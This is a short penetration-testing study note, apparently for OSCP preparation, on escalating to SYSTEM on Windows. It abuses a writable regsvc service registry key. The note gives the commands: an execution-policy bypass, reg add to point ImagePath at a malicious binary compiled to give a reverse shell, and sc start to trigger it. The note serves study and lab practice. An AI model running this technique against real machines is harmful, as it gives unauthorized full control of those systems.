// notes/ PrivEsc — Windows
🪟
Registy Regsvc Acl
After enumeration, if it's discovered that we have full permissions to a registry key, we can compile a malicious executable written in C and get it to run a command for us as sys…
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/registy_regsvc-acl ↗Regsvc ACL
Overview
After enumeration, if it's discovered that we have full permissions to a registry key, we can compile a malicious executable written in C and get it to run a command for us as system
Escalation via Regsvc
View permissions on registry key
powerquery
01powershell -exec bypass -NoP02Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | flChange the command to get a reverse shell and compile the executable
<figure><img src="/files/YecTPLuBpQiWEKtZgEM3" alt=""><figcaption></figcaption></figure>bash
$x86_64-w64-mingw32-gcc windows_service.c -o x.exe Add the executable to the service
powerquery
01reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f- /v - What is the value name
- ImagePath - Is a registry key that contains the path of the drivers image file
- So if you place the file here and run the service it will run the executable
- /t - type being REG_EXPAND_SZ which is running a string value
- /d - Data being C:\temp\x.exe ; data you want to use
- /f - No prompts for confirmation just execute
Start the service and pop a shell
code
01sc start regsvc